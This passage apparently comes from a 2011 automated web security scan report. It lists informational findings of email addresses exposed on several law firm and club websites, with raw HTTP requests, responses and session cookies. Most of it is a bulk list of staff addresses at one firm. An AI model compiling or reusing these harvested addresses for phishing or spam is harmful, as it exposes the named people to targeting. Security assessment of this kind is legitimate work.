User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:55:39 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63369


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Attorneys | Attorney Search Results</title>
       
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="jav
...[SNIP]...
<a href="javascript:ConfirmMail('hadelstein@ngelaw.com');">hadelstein@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('nalkhas@ngelaw.com');">nalkhas@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('callen@ngelaw.com');">callen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ealva@ngelaw.com');">ealva@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('aazaran@ngelaw.com');">aazaran@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mbailey@ngelaw.com');">mbailey@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('sbakal@ngelaw.com');">sbakal@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jbakker@ngelaw.com');">jbakker@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pbarrow@ngelaw.com');">pbarrow@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rbedore@ngelaw.com');">rbedore@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('wbendersky@ngelaw.com');">wbendersky@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lbenjamin@ngelaw.com');">lbenjamin@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('nberberian@ngelaw.com');">nberberian@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('sberger@ngelaw.com');">sberger@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jberkeley@ngelaw.com');">jberkeley@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mberkoff@ngelaw.com');">mberkoff@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('hbernstein@ngelaw.com');">hbernstein@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jbiederman@ngelaw.com');">jbiederman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jbiek@ngelaw.com');">jbiek@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pblanchard@ngelaw.com');">pblanchard@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('kblouin@ngelaw.com');">kblouin@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('eboyle@ngelaw.com');">eboyle@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tboyle@ngelaw.com');">tboyle@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('abrown@ngelaw.com');">abrown@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rbrowne@ngelaw.com');">rbrowne@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cburky@ngelaw.com');">cburky@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pcain@ngelaw.com');">pcain@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mcarrillo@ngelaw.com');">mcarrillo@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('echoi@ngelaw.com');">echoi@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('wchoslovsky@ngelaw.com');">wchoslovsky@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('bcohen@ngelaw.com');">bcohen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('scohen@ngelaw.com');">scohen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jcoleman@ngelaw.com');">jcoleman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jcullis@ngelaw.com');">jcullis@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cdemento@ngelaw.com');">cdemento@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jderbis@ngelaw.com');">jderbis@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('adering@ngelaw.com');">adering@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('adespotes@ngelaw.com');">adespotes@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mdiedrich@ngelaw.com');">mdiedrich@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('adudding@ngelaw.com');">adudding@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('meisenberg@ngelaw.com');">meisenberg@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('aelbert@ngelaw.com');">aelbert@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dellis@ngelaw.com');">dellis@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('remmerman@ngelaw.com');">remmerman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('leulgen@ngelaw.com');">leulgen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('wfarrell@ngelaw.com');">wfarrell@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('sfedo@ngelaw.com');">sfedo@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('afeldman@ngelaw.com');">afeldman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mfinnegan@ngelaw.com');">mfinnegan@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('sfisher@ngelaw.com');">sfisher@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jfournier@ngelaw.com');">jfournier@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('bfox@ngelaw.com');">bfox@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('hfreiburger@ngelaw.com');">hfreiburger@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('efriedler@ngelaw.com');">efriedler@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jfrye@ngelaw.com');">jfrye@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('kgacem@ngelaw.com');">kgacem@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ngantz@ngelaw.com');">ngantz@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jgardner@ngelaw.com');">jgardner@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lgeoffrey@ngelaw.com');">lgeoffrey@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lgeorge@ngelaw.com');">lgeorge@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rgerber@ngelaw.com');">rgerber@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ggolden@ngelaw.com');">ggolden@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('sgoldenberg@ngelaw.com');">sgoldenberg@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mgray@ngelaw.com');">mgray@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mgurland@ngelaw.com');">mgurland@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dgutfeld@ngelaw.com');">dgutfeld@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('igzesh@ngelaw.com');">igzesh@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('klharris@ngelaw.com');">klharris@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('khinner@ngelaw.com');">khinner@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lhorn@ngelaw.com');">lhorn@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mfhughes@ngelaw.com');">mfhughes@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mhughes@ngelaw.com');">mhughes@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ljames@ngelaw.com');">ljames@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mkaluza@ngelaw.com');">mkaluza@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mkelber@ngelaw.com');">mkelber@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jkim@ngelaw.com');">jkim@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jskim@ngelaw.com');">jskim@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mking@ngelaw.com');">mking@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pking@ngelaw.com');">pking@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jklein@ngelaw.com');">jklein@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('akoday@ngelaw.com');">akoday@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mkoenders@ngelaw.com');">mkoenders@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jkoenigsknecht@ngelaw.com');">jkoenigsknecht@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ckorenaga@ngelaw.com');">ckorenaga@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jkraft@ngelaw.com');">jkraft@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('slamden@ngelaw.com');">slamden@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('gleighton@ngelaw.com');">gleighton@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('wlenz@ngelaw.com');">wlenz@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('blitwin@ngelaw.com');">blitwin@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('llozada@ngelaw.com');">llozada@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dmadden@ngelaw.com');">dmadden@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('smalia@ngelaw.com');">smalia@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mmanhart@ngelaw.com');">mmanhart@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mmanly@ngelaw.com');">mmanly@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('emann@ngelaw.com');">emann@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('hmann@ngelaw.com');">hmann@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dmartin@ngelaw.com');">dmartin@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('gmateoharris@ngelaw.com');">gmateoharris@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('amay@ngelaw.com');">amay@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('kmay@ngelaw.com');">kmay@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tmcdonough@ngelaw.com');">tmcdonough@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tmcnulty@ngelaw.com');">tmcnulty@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('amcshane@ngelaw.com');">amcshane@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('emelamed@ngelaw.com');">emelamed@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cmickus@ngelaw.com');">cmickus@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('nmiller@ngelaw.com');">nmiller@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('emilman@ngelaw.com');">emilman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cmilstein@ngelaw.com');">cmilstein@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cmoeller@ngelaw.com');">cmoeller@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lmoon@ngelaw.com');">lmoon@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jmuraff@ngelaw.com');">jmuraff@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pneal@ngelaw.com');">pneal@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mnelson@ngelaw.com');">mnelson@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tnewman@ngelaw.com');">tnewman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jnewton@ngelaw.com');">jnewton@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pnewton@ngelaw.com');">pnewton@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mnicolas@ngelaw.com');">mnicolas@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('knye@ngelaw.com');">knye@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tpapadopoulos@ngelaw.com');">tpapadopoulos@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('spflaum@ngelaw.com');">spflaum@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rradasevich@ngelaw.com');">rradasevich@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('crdzak@ngelaw.com');">crdzak@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rreinhard@ngelaw.com');">rreinhard@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('krettberg@ngelaw.com');">krettberg@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mrice@ngelaw.com');">mrice@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lrichman@ngelaw.com');">lrichman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dritter@ngelaw.com');">dritter@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('srosenberg@ngelaw.com');">srosenberg@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('brosner@ngelaw.com');">brosner@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rrussell@ngelaw.com');">rrussell@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jsantangelo@ngelaw.com');">jsantangelo@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mschacht@ngelaw.com');">mschacht@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('jscharkey@ngelaw.com');">jscharkey@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('cschaul@ngelaw.com');">cschaul@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lschleicher@ngelaw.com');">lschleicher@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('kschneider@ngelaw.com');">kschneider@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('aselin@ngelaw.com');">aselin@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('msher@ngelaw.com');">msher@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('ssmith@ngelaw.com');">ssmith@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('pstern@ngelaw.com');">pstern@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('dstone@ngelaw.com');">dstone@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('wtarnow@ngelaw.com');">wtarnow@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('bthelen@ngelaw.com');">bthelen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mtish@ngelaw.com');">mtish@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mturner@ngelaw.com');">mturner@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('svasconcellos@ngelaw.com');">svasconcellos@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('kvega@ngelaw.com');">kvega@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('svenverloh@ngelaw.com');">svenverloh@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('bweichbrodt@ngelaw.com');">bweichbrodt@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rweiss@ngelaw.com');">rweiss@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('tweissman@ngelaw.com');">tweissman@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('awen@ngelaw.com');">awen@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('twilliams@ngelaw.com');">twilliams@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('twiner@ngelaw.com');">twiner@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('twolford@ngelaw.com');">twolford@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('twoodie@ngelaw.com');">twoodie@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('azdravecky@ngelaw.com');">azdravecky@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('lzebovitz@ngelaw.com');">lzebovitz@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('rzimelis@ngelaw.com');">rzimelis@ngelaw.com</a>
...[SNIP]...
<a href="javascript:ConfirmMail('mzmora@ngelaw.com');">mzmora@ngelaw.com</a>
...[SNIP]...
27.34. http://www.ngelaw.com/news/event_detail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/event_detail.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /news/event_detail.aspx?ID=688 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/events.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:24 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9625


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Tax Planning for Domestic & Foreign Partnerships, LLCs, Joint Ventures & Other Strategic Alliances 2011</title>
       <meta name="description" c
...[SNIP]...
<a href="javascript:ConfirmMail('events@ngelaw.com');" style="text-decoration:none">
...[SNIP]...
27.35. http://www.ngelaw.com/news/events.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/events.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /news/events.aspx HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/detail.aspx?ID=1125
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:15 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11823


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Events</title>
       <meta name="description" content="In the Medi">
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <scr
...[SNIP]...
<a href="javascript:ConfirmMail('events@ngelaw.com');" style="text-decoration:none">
...[SNIP]...
27.36. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

Issue detail

The following email addresses were disclosed in the response:

Request

GET /news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:47:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a title="klking@cov.com" href="javascript:void(location.href=&#39;mailto:&#39;+String.fromCharCode(118,106,103,114,97,121,64,111,98,101,114,46,99,111,109)+&#39;?&#39;)">vjgray@ober.com</a>
...[SNIP]...
27.37. http://www.ober.com/practices/32  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/32

Issue detail

The following email address was disclosed in the response:

Request

GET /practices/32 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/intellectual-property
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:55:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:johnson@ober.com" onclick="return email_verify();" title="Email E. Scott Johnson">
...[SNIP]...
27.38. http://www.ober.com/practices/55  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/55

Issue detail

The following email addresses were disclosed in the response:

Request

GET /practices/55 HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/32
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:56:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10161

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:jeedwards@ober.com" onclick="return email_verify();" title="Email James E. Edwards, Jr.">
...[SNIP]...
<a href="mailto:ejsteren@ober.com" onclick="return email_verify();" title="Email E. John Steren">
...[SNIP]...
27.39. http://www.ober.com/practices/intellectual-property  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ober.com
Path:   /practices/intellectual-property

Issue detail

The following email address was disclosed in the response:

Request

GET /practices/intellectual-property HTTP/1.1
Host: www.ober.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ober.com/practices/index
Cookie: __utma=229248322.977524302.1305216548.1305216548.1305216548.1; __utmc=229248322; __utmz=229248322.1305216548.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Ober%20Kaler

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 17:55:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:johnson@ober.com" onclick="return email_verify();" title="Email E. Scott Johnson">
...[SNIP]...
27.40. http://www.orangecountyala.org/clubportal/js/date-picker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orangecountyala.org
Path:   /clubportal/js/date-picker.js

Issue detail

The following email address was disclosed in the response:

Request

GET /clubportal/js/date-picker.js HTTP/1.1
Host: www.orangecountyala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.orangecountyala.org/clubportal/ocala/
Cookie: CFID=26523218; CFTOKEN=a4960fc383a335aa-E56858CC-0132-58C2-D7502B069979AD31; CFGLOBALS=urltoken%3DCFID%23%3D26523218%26CFTOKEN%23%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A51%27%7D%23hitcount%3D2%23cftoken%3Da4960fc383a335aa%2DE56858CC%2D0132%2D58C2%2DD7502B069979AD31%23cfid%3D26523218%23

Response

HTTP/1.1 200 OK
Content-Length: 16882
Content-Type: application/x-javascript
Content-Location: http://www.orangecountyala.org/clubportal/js/date-picker.js
Last-Modified: Mon, 10 Dec 2007 07:00:00 GMT
Accept-Ranges: bytes
ETag: "018bf47fa3ac81:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:11:53 GMT


<!-- Original: Kedar R. Bhave (softricks@hotmail.com) -->
<!-- Web Site: http://www.softricks.com -->

<!-- This script and many more are available free online at -->
<!-- The JavaScript Sourc
...[SNIP]...
27.41. http://www.peckshaffer.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.peckshaffer.com
Path:   /contact.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contact.php HTTP/1.1
Host: www.peckshaffer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:56:07 GMT
Server: Apache/2.0.46 (Red Hat)
